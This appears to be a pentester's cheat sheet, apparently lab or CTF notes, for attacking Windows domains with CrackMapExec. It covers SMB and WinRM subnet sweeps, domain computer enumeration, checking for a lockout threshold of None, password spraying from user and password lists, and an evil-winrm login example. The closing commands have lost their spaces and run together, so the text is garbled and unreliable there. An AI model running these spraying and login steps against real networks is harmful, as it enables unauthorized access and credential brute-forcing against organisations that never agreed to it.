crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24
# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers
Password spraying
check the password policy
crackmapexec smb $IP --pass-pol
# check this, if there is info like this go ahead for bruteforce.
Account Lockout Threshold: None
prepare for targets.txt, users.txt and passwords.txt
crackmapexecwinrmtargets.txt-uusers.txt-ppasswords.txt--continue-on-success-d<domain>crackmapexecsmb $IP -uusers.txt-p'<password>'crackmapexecwinrm $IP -uusers.txt-p'<password>'# --> use evil-winrm to login# example: evil-winrm -u mhope -p 'testpassword' -i $IP